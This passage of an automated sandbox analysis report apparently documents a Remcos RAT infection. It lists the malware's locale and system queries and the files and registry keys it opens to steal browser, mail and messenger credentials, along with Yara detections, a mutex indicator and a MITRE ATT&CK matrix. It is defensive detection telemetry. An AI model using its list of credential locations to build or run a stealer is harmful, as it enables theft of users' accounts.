                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_00452690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,13_2_0044896D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,13_2_0040F90C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,13_2_00451D58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_00451FD0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041B890 GetSystemTimes,Sleep,GetSystemTimes,__aulldiv,13_2_0041B890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041B69E GetComputerNameExW,GetUserNameW,13_2_0041B69E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,13_2_00449210
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041739B GetVersionExW,15_2_0041739B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.919651598.0000000000321000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2136, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\nor\logs.dat, type: DROPPED
                Contains functionality to steal Chrome passwords or cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data13_2_0040BA4D
                Contains functionality to steal Firefox passwords or cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\13_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db13_2_0040BB6B
                Searches for Windows Mail specific files
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                Tries to steal Instant Messenger accounts or passwords
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                Tries to steal Mail credentials (via file registry)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword16_2_004033F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword16_2_00402DB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword16_2_00402DB3
                Yara detected WebBrowserPassView password recovery tool
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1060, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-IAW1Y3Jump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.919651598.0000000000321000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2136, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\nor\logs.dat, type: DROPPED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe13_2_0040569A

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting                		Valid Accounts11
                Native API                		111
                Scripting                		1
                DLL Side-Loading                		11
                Deobfuscate/Decode Files or Information                		2
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		13
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts43
                Exploitation for Client Execution                		1
                DLL Side-Loading                		1
                Bypass User Account Control                		2
                Obfuscated Files or Information                		211
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		21
                Encrypted Channel                		Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts122
                Command and Scripting Interpreter                		1
                Windows Service                		1
                Access Token Manipulation                		1
                DLL Side-Loading                		2
                Credentials in Registry                		1
                System Service Discovery                		SMB/Windows Admin Shares2
                Email Collection                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Service Execution                		Login Hook1
                Windows Service                		1
                Bypass User Account Control                		3
                Credentials In Files                		4
                File and Directory Discovery                		Distributed Component Object Model211
                Input Capture                		1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts3
                PowerShell                		Network Logon Script422
                Process Injection                		1
                Masquerading                		LSA Secrets38
                System Information Discovery                		SSH3
                Clipboard Data                		2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Virtualization/Sandbox Evasion                		Cached Domain Credentials3
                Security Software Discovery                		VNCGUI Input Capture113
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation                		DCSync21
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job422
                Process Injection                		Proc Filesystem4
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                Remote System Discovery                		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
